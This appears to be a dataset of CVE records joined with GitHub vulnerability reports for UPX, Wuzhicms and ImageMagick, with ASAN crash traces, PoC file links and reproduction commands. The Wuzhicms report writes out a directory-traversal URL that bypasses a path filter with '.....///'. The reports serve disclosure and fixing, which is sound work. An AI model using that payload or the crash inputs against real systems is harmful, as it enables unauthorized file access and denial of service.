2020-07-24T08:10:02Z
2020-08-06T06:30:04Z
https://github.com/upx/upx/issues/395
664,994,296
395
CVE-2020-27801
2022-08-25T20:15:08.727
A heap-based buffer over-read was discovered in the get_le64 function in bele.h in UPX 4.0.0 via a crafted Mach-O file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/394" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D3527302-7874-4400-B123-99C1CA6FE8EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/upx/upx/issues/394
[ "Exploit", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
Author: giantbranch of NSFOCUS Security Team ## What's the problem (or question)? A heap buffer overflow read in the latest commit of the devel branch ASAN reports: ``` ==4525==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fab6ae5cdd8 at pc 0x000000757297 bp 0x7fff2d255a60 sp 0x7fff2d255a58 READ of size 8 at 0x7fab6ae5cdd8 thread T0 #0 0x757296 in get_le64(void const*) /src/upx-multi/src/./bele.h:182:12 #1 0x757296 in N_BELE_RTP::LEPolicy::get64(void const*) const /src/upx-multi/src/./bele_policy.h:194:18 #2 0x5d0419 in Packer::get_te64(void const*) const /src/upx-multi/src/./packer.h:297:65 #3 0x5d0419 in PackLinuxElf64::unpack(OutputFile*) /src/upx-multi/src/p_lx_elf.cpp:4603:43 #4 0x6c82b0 in Packer::doUnpack(OutputFile*) /src/upx-multi/src/packer.cpp:107:5 #5 0x7589f8 in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12 #6 0x759f42 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13 #7 0x555afd in main /src/upx-multi/src/main.cpp:1538:5 #8 0x7fab6992783f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #9 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98) 0x7fab6ae5cdd8 is located 0 bytes to the right of 132568-byte region [0x7fab6ae3c800,0x7fab6ae5cdd8) allocated by thread T0 here: #0 0x49519d in malloc (/out/upx-multi/upx-multi+0x49519d) #1 0x5697b7 in MemBuffer::alloc(unsigned long long) /src/upx-multi/src/mem.cpp:194:42 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/upx-multi/src/./bele.h:182:12 in get_le64(void const*) Shadow bytes around the buggy address: 0x0ff5ed5c3960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff5ed5c3970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff5ed5c3980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff5ed5c3990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff5ed5c39a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0ff5ed5c39b0: 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa 0x0ff5ed5c39c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff5ed5c39d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff5ed5c39e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff5ed5c39f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff5ed5c3a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==4525==ABORTING ``` ## What should have happened? Check if the file is normal, exit if abnormal ## Do you have an idea for a solution? Add more checks ## How can we reproduce the issue? upx.out -d <poc_filename> poc: [tests_a7c92caa967187b16a8927c29de0efee0d1f2ed5_.tar.gz](https://github.com/upx/upx/files/4970462/tests_a7c92caa967187b16a8927c29de0efee0d1f2ed5_.tar.gz) ``` $ ./src/upx.out -d ./tests_a7c92caa967187b16a8927c29de0efee0d1f2ed5_.tar.gz Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX git-8d1d60 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 24th 2020 File size Ratio Format Name -------------------- ------ ----------- ----------- Segmentation fault ``` ## Please tell us details about your environment. * UPX version used (`upx --version`): ``` upx 4.0.0-git-8d1d605b3d8c+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov UPX comes with ABSOLUTELY NO WARRANTY; for details type 'upx-multi -L'. ``` * Host Operating System and version: Ubuntu 16.04.2 LTS * Host CPU architecture: x86_64 * Target Operating System and version: same as Host * Target CPU architecture: same as Host
Heap buffer overflow in get_le64()
https://api.github.com/repos/upx/upx/issues/394/comments
1
2020-07-24T06:42:22Z
2020-08-06T06:29:58Z
https://github.com/upx/upx/issues/394
664,953,164
394
CVE-2020-27802
2022-08-25T20:15:08.777
An floating point exception was discovered in the elf_lookup function in p_lx_elf.cpp in UPX 4.0.0 via a crafted Mach-O file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/393" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D3527302-7874-4400-B123-99C1CA6FE8EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/upx/upx/issues/393
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
Author: giantbranch of NSFOCUS Security Team ## What's the problem (or question)? Floating point exception was found in PackLinuxElf32::elf_lookup of p_lx_elf.cpp (the latest commit of the devel branch) through debugging,because of div 0 ``` ────────────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────────── ► 0x44d810 div dword ptr [rbp - 0xe8] ↓ ► 0x44d810 div dword ptr [rbp - 0xe8] ────────────────────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────────────────── 5395 { 5396 if (hashtab && dynsym && dynstr) { 5397 unsigned const nbucket = get_te32(&hashtab[0]); 5398 unsigned const *const buckets = &hashtab[2]; 5399 unsigned const *const chains = &buckets[nbucket]; ► 5400 unsigned const m = elf_hash(name) % nbucket; 5401 if (!nbucket 5402 || (unsigned)(file_size - ((char const *)buckets - (char const *)(void const *)file_image)) 5403 <= sizeof(unsigned)*nbucket ) { 5404 char msg[80]; snprintf(msg, sizeof(msg), 5405 "bad nbucket %#x\n", nbucket); ────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────── 00:0000│ rsp 0x7fffffffd2c0 —▸ 0x4e4017 ◂— pop r15 /* 'JNI_OnLoad' */ 01:0008│ 0x7fffffffd2c8 —▸ 0x817030 —▸ 0x53f580 ◂— add byte ptr [rax], al 02:0010│ 0x7fffffffd2d0 —▸ 0x7fffffffd2f0 —▸ 0x7fffffffd310 —▸ 0x7fffffffd380 —▸ 0x7fffffffd3c0 ◂— ... 03:0018│ 0x7fffffffd2d8 ◂— 0x0 04:0020│ 0x7fffffffd2e0 —▸ 0x817884 ◂— 0x1200 05:0028│ 0x7fffffffd2e8 —▸ 0x804fd8 (N_BELE_RTP::le_policy) —▸ 0x5e5be8 —▸ 0x4b8d50 (N_BELE_RTP::LEPolicy::~LEPolicy()) ◂— push rbp 06:0030│ 0x7fffffffd2f0 —▸ 0x7fffffffd310 —▸ 0x7fffffffd380 —▸ 0x7fffffffd3c0 —▸ 0x7fffffffd410 ◂— ... 07:0038│ 0x7fffffffd2f8 —▸ 0x4507b8 ◂— leave ──────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────── ► f 0 44d810 f 1 4377de PackLinuxElf32::PackLinuxElf32help1(InputFile*)+1632 f 2 450a5b PackLinuxElf32Le::PackLinuxElf32Le(InputFile*)+79 f 3 44b371 PackLinuxElf32x86::PackLinuxElf32x86(InputFile*)+35 f 4 44b47b PackBSDElf32x86::PackBSDElf32x86(InputFile*)+35 f 5 44b533 PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile*)+35 f 6 49a936 f 7 49c2be PackMaster::getUnpacker(InputFile*)+40 f 8 49c362 PackMaster::unpack(OutputFile*)+32 f 9 4b9272 f 10 4b9663 Program received signal SIGFPE pwndbg> x /gx $rbp - 0xe8 0x7fffffffd2d8: 0x0000000000000000 ``` ASAN reports: ``` ==5426==ERROR: AddressSanitizer: FPE on unknown address 0x0000005d93dc (pc 0x0000005d93dc bp 0x7fffd6ee8580 sp 0x7fffd6ee8200 T0) #0 0x5d93dc in PackLinuxElf32::elf_lookup(char const*) const /src/upx-multi/src/p_lx_elf.cpp:5400:43 #1 0x588c27 in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:318:26 #2 0x5d5e74 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile*) /src/upx-multi/src/./p_lx_elf.h:395:9 #3 0x5d5e74 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4838:54 #4 0x5d6261 in PackBSDElf32x86::PackBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4855:50 #5 0x5d6261 in PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4866:58 #6 0x6e4460 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /src/upx-multi/src/packmast.cpp:190:9 #7 0x6e8ff1 in PackMaster::getUnpacker(InputFile*) /src/upx-multi/src/packmast.cpp:248:18 #8 0x6e8ff1 in PackMaster::unpack(OutputFile*) /src/upx-multi/src/packmast.cpp:266:9 #9 0x75826b in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12 #10 0x7597c2 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13 #11 0x555aed in main /src/upx-multi/src/main.cpp:1538:5 #12 0x7f999579b83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #13 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: FPE /src/upx-multi/src/p_lx_elf.cpp:5400:43 in PackLinuxElf32::elf_lookup(char const*) const ==5426==ABORTING ``` ## What should have happened? Check if the file is normal, exit if abnormal ## Do you have an idea for a solution? Add more checks ## How can we reproduce the issue? upx.out -d <poc_filename> poc: [tests_1119229d81ae333c2b95061a6d3ab57e09049c74_.tar.gz](https://github.com/upx/upx/files/4964802/tests_1119229d81ae333c2b95061a6d3ab57e09049c74_.tar.gz) ## Please tell us details about your environment. * UPX version used (`upx --version`): ``` upx 4.0.0-git-87b73e5cfdc1+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov UPX comes with ABSOLUTELY NO WARRANTY; for details t ``` * Host Operating System and version: Ubuntu 16.04.2 LTS * Host CPU architecture: x86_64 * Target Operating System and version: same as Host * Target CPU architecture: same as Host
Floating point exception in PackLinuxElf32::elf_lookup
https://api.github.com/repos/upx/upx/issues/393/comments
1
2020-07-23T09:02:02Z
2020-08-06T06:29:52Z
https://github.com/upx/upx/issues/393
664,311,420
393
CVE-2022-36168
2022-08-26T00:15:09.237
A directory traversal vulnerability was discovered in Wuzhicms 4.1.0. via /coreframe/app/attachment/admin/index.php:
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.7, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 1.4, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cigar-Fasion/CVE/issues/1" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/202" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wuzhicms:wuzhicms:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B76E69A-B2F3-4359-A7C0-046CEE2FAEEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/wuzhicms/wuzhicms/issues/202
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "wuzhicms", "wuzhicms" ]
A directory traversal vulnerability was discovered in WUZHI CMS 4.1.0. Directory traversal allows authenticated remote attackers to list files in any directory. Vulnerability in /coreframe/app/attachment/admin/index.php: ``` public function dir() { $dir = isset($GLOBALS['dir']) && trim($GLOBALS['dir']) ? str_replace(array('..\\', '../', './', '.\\'), '', trim($GLOBALS['dir'])) : ''; $dir = str_ireplace(array('%2F', '//'), '/', $dir); $lists = glob(ATTACHMENT_ROOT . $dir . '/' . '*'); if (!empty($lists)) rsort($lists); $cur_dir = str_replace(array(WWW_ROOT, DIRECTORY_SEPARATOR . DIRECTORY_SEPARATOR), array('', DIRECTORY_SEPARATOR), ATTACHMENT_ROOT . $dir . '/'); include $this->template('dir', M); } ``` Even if the "str_replace" function filters some characters, it can still bypass the blacklist with ".....///" 1.Log in as admin ![image](https://user-images.githubusercontent.com/57355558/178402193-9f2a7884-3e5f-4b7d-b82a-b19a5a874b29.png) 2.Vulnerability trigger point `http://www.test.com/index.php?m=attachment&f=index&_su=wuzhicms&v=dir&dir=/.....///.....///.....///.....///` ![image](https://user-images.githubusercontent.com/57355558/178402374-02b63c36-c778-42b7-8b5d-003c60ff2732.png)
Wuzhicms v4.1.0 /coreframe/app/attachment/admin/index.php hava a directory traversal Vulnerability
https://api.github.com/repos/wuzhicms/wuzhicms/issues/202/comments
1
2022-07-12T03:28:46Z
2023-01-08T02:20:43Z
https://github.com/wuzhicms/wuzhicms/issues/202
1,301,485,949
202
CVE-2021-3574
2022-08-26T16:15:08.943
A vulnerability was found in ImageMagick-7.0.11-5, where executing a crafted file with the convert command, ASAN detects memory leaks.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 1.4, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/c6ad94fbb7b280f39c2fbbdc1c140e51b1b466e9" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/3540" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/cd7f9fb7751b0d59d5a74b12d971155caad5a792" }, { "source": "[email protected]", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00008.html" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4Q6MJAMGHGB552KSFTQKXEKJVQNM4MCT/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5C6XAGUFPUF4SNVCI2T4OJK3EFIENBGP/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LNVDNM4ZEIYPT3SLZHPYN7OG4CZLEXZJ/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.11-5:*:*:*:*:*:*:*", "matchCriteriaId": "3769F997-3EBC-4222-B3D4-8709A7AA49FE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/3540
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites I have written a descriptive issue title I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported I have verified that I am using the latest version of ImageMagick ### ImageMagick version 7.0.11-5 ### Operating system Linux ### Operating system, version and so on Ubuntu 18.04, 64bit ### Description When we execute the convert command, asan reports the error LeakSanitizer: detected memory leaks. ### Steps to Reproduce ## Command please run a following cmd with poc file. [POC](https://github.com/NISL-SecurityGroup/NISL-BugDetection/blob/main/project/ImageMagick/memory_leaks/magick-memory_leaks) ```$ magick convert $poc out.bmp``` ## Result Here's ASAN report: ``` convert: Invalid TIFF directory; tags are not sorted in ascending order. `TIFFReadDirectoryCheckOrder' @ warning/tiff.c/TIFFWarnings/960. convert: Unknown field with tag 4096 (0x1000) encountered. `TIFFReadDirectory' @ warning/tiff.c/TIFFWarnings/960. convert: Nonstandard tile width 17990, convert file. `id:000006,sig:09,src:000052,time:16507786,op:flip1,pos:23' @ warning/tiff.c/TIFFWarnings/960. convert: Unknown field with tag 29255 (0x7247) encountered. `TIFFReadDirectory' @ warning/tiff.c/TIFFWarnings/960. convert: Unknown field with tag 63745 (0xf901) encountered. `TIFFReadDirectory' @ warning/tiff.c/TIFFWarnings/960. convert: Unknown field with tag 0 (0x0) encountered. `TIFFReadDirectory' @ warning/tiff.c/TIFFWarnings/960. convert: IO error during reading of "Tag 4096"; tag ignored. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/960. convert: ASCII value for tag "DocumentName" contains null byte in value; value incorrectly truncated during reading due to implementation limitations. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/960. convert: Incorrect count for "XResolution"; tag ignored. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/960. convert: Incorrect count for "YResolution"; tag ignored. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/960. convert: Sum of Photometric type-related color channels and ExtraSamples doesn't match SamplesPerPixel. Defining non-color channels as ExtraSamples.. `TIFFReadDirectory' @ warning/tiff.c/TIFFWarnings/960. convert: MaximumChannelsExceeded `id:000006,sig:09,src:000052,time:16507786,op:flip1,pos:23' @ error/tiff.c/ReadTIFFImage/1734. convert: NoImagesDefined `out.bmp' @ error/convert.c/ConvertImageCommand/3322. ================================================================= ==9304==ERROR: LeakSanitizer: detected memory leaks Direct leak of 152 byte(s) in 1 object(s) allocated from: #0 0x7fedc6aff517 in malloc (/lib/x86_64-linux-gnu/libasan.so.6+0xb0517) #1 0x55643dee6ca6 in AcquireMagickMemory MagickCore/memory.c:558 #2 0x55643dee6ccc in AcquireCriticalMemory MagickCore/memory.c:634 #3 0x55643e5a3d32 in AcquireQuantumInfo MagickCore/quantum.c:119 #4 0x55643e309aa6 in ReadTIFFImage coders/tiff.c:1672 #5 0x55643e3c6615 in ReadImage MagickCore/constitute.c:563 #6 0x55643e3c98df in ReadImages MagickCore/constitute.c:955 #7 0x55643e7749c5 in ConvertImageCommand MagickWand/convert.c:611 #8 0x55643e8a5152 in MagickCommandGenesis MagickWand/mogrify.c:191 #9 0x55643deb10fd in MagickMain utilities/magick.c:149 #10 0x55643deb13a8 in main utilities/magick.c:180 #11 0x7fedc57b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) Indirect leak of 14922012 byte(s) in 28 object(s) allocated from: #0 0x7fedc6b0021c in posix_memalign (/lib/x86_64-linux-gnu/libasan.so.6+0xb121c) #1 0x55643dee69c8 in AcquireAlignedMemory_POSIX MagickCore/memory.c:299 #2 0x55643dee6be8 in AcquireAlignedMemory MagickCore/memory.c:377 #3 0x55643dee7348 in AcquireVirtualMemory MagickCore/memory.c:746 #4 0x55643e5a40b4 in AcquireQuantumPixels MagickCore/quantum.c:177 #5 0x55643e5a5db5 in SetQuantumDepth MagickCore/quantum.c:699 #6 0x55643e5a6201 in SetQuantumFormat MagickCore/quantum.c:779 #7 0x55643e309bf7 in ReadTIFFImage coders/tiff.c:1676 #8 0x55643e3c6615 in ReadImage MagickCore/constitute.c:563 #9 0x55643e3c98df in ReadImages MagickCore/constitute.c:955 #10 0x55643e7749c5 in ConvertImageCommand MagickWand/convert.c:611 #11 0x55643e8a5152 in MagickCommandGenesis MagickWand/mogrify.c:191 #12 0x55643deb10fd in MagickMain utilities/magick.c:149 #13 0x55643deb13a8 in main utilities/magick.c:180 #14 0x7fedc57b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) Indirect leak of 115584 byte(s) in 28 object(s) allocated from: #0 0x7fedc6b0021c in posix_memalign (/lib/x86_64-linux-gnu/libasan.so.6+0xb121c) #1 0x55643dee69c8 in AcquireAlignedMemory_POSIX MagickCore/memory.c:299 #2 0x55643dee6be8 in AcquireAlignedMemory MagickCore/memory.c:377 #3 0x55643dee7137 in AcquireVirtualMemory MagickCore/memory.c:737 #4 0x55643e5a40b4 in AcquireQuantumPixels MagickCore/quantum.c:177 #5 0x55643e5a5db5 in SetQuantumDepth MagickCore/quantum.c:699 #6 0x55643e5a6201 in SetQuantumFormat MagickCore/quantum.c:779 #7 0x55643e309bf7 in ReadTIFFImage coders/tiff.c:1676 #8 0x55643e3c6615 in ReadImage MagickCore/constitute.c:563 #9 0x55643e3c98df in ReadImages MagickCore/constitute.c:955 #10 0x55643e7749c5 in ConvertImageCommand MagickWand/convert.c:611 #11 0x55643e8a5152 in MagickCommandGenesis MagickWand/mogrify.c:191 #12 0x55643deb10fd in MagickMain utilities/magick.c:149 #13 0x55643deb13a8 in main utilities/magick.c:180 #14 0x7fedc57b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) Indirect leak of 224 byte(s) in 1 object(s) allocated from: #0 0x7fedc6aff517 in malloc (/lib/x86_64-linux-gnu/libasan.so.6+0xb0517) #1 0x55643dee6ca6 in AcquireMagickMemory MagickCore/memory.c:558 #2 0x55643dee6f29 in AcquireQuantumMemory MagickCore/memory.c:676 #3 0x55643e5a3f68 in AcquireQuantumPixels MagickCore/quantum.c:165 #4 0x55643e5a5db5 in SetQuantumDepth MagickCore/quantum.c:699 #5 0x55643e5a6201 in SetQuantumFormat MagickCore/quantum.c:779 #6 0x55643e309bf7 in ReadTIFFImage coders/tiff.c:1676 #7 0x55643e3c6615 in ReadImage MagickCore/constitute.c:563 #8 0x55643e3c98df in ReadImages MagickCore/constitute.c:955 #9 0x55643e7749c5 in ConvertImageCommand MagickWand/convert.c:611 #10 0x55643e8a5152 in MagickCommandGenesis MagickWand/mogrify.c:191 #11 0x55643deb10fd in MagickMain utilities/magick.c:149 #12 0x55643deb13a8 in main utilities/magick.c:180 #13 0x7fedc57b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x7fedc6b0021c in posix_memalign (/lib/x86_64-linux-gnu/libasan.so.6+0xb121c) #1 0x55643df53422 in AcquireSemaphoreMemory MagickCore/semaphore.c:154 #2 0x55643df53523 in AcquireSemaphoreInfo MagickCore/semaphore.c:200 #3 0x55643e5a4cdc in GetQuantumInfo MagickCore/quantum.c:430 #4 0x55643e5a3d82 in AcquireQuantumInfo MagickCore/quantum.c:121 #5 0x55643e309aa6 in ReadTIFFImage coders/tiff.c:1672 #6 0x55643e3c6615 in ReadImage MagickCore/constitute.c:563 #7 0x55643e3c98df in ReadImages MagickCore/constitute.c:955 #8 0x55643e7749c5 in ConvertImageCommand MagickWand/convert.c:611 #9 0x55643e8a5152 in MagickCommandGenesis MagickWand/mogrify.c:191 #10 0x55643deb10fd in MagickMain utilities/magick.c:149 #11 0x55643deb13a8 in main utilities/magick.c:180 #12 0x7fedc57b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: 15038036 byte(s) leaked in 59 allocation(s). ``` ## Additional information: ``` $ CC="gcc" CXX="g++" bash ./configure --disable-shared $ make ``` ``` $ export AFL_USE_ASAN=1 AFL_USE_UBSAN=1 $ export AFL_LLVM_CMPLOG=1 $ CC=/usr/local/bin/afl-clang-fast CXX=/usr/local/bin/afl-clang-fast++ bash ./configure --disable-shared $ make ``` ``` Version: ImageMagick 7.0.11-5 Q16 x86_64 2021-03-20 https://imagemagick.org Copyright: (C) 1999-2021 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP(5.0) Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png tiff x xml zlib ```
AddressSanitizer report LeakSanitizer: detected memory leaks when executing convert command
https://api.github.com/repos/ImageMagick/ImageMagick/issues/3540/comments
11
2021-04-13T14:50:19Z
2022-11-30T17:19:10Z
https://github.com/ImageMagick/ImageMagick/issues/3540
857,040,605
3,540
CVE-2022-0284
2022-08-29T15:15:09.183
A heap-based-buffer-over-read flaw was found in ImageMagick's GetPixelAlpha() function of 'pixel-accessor.h'. This vulnerability is triggered when an attacker passes a specially crafted Tagged Image File Format (TIFF) image to convert it into a PICON file format. This issue can potentially lead to a denial of service and information disclosure.
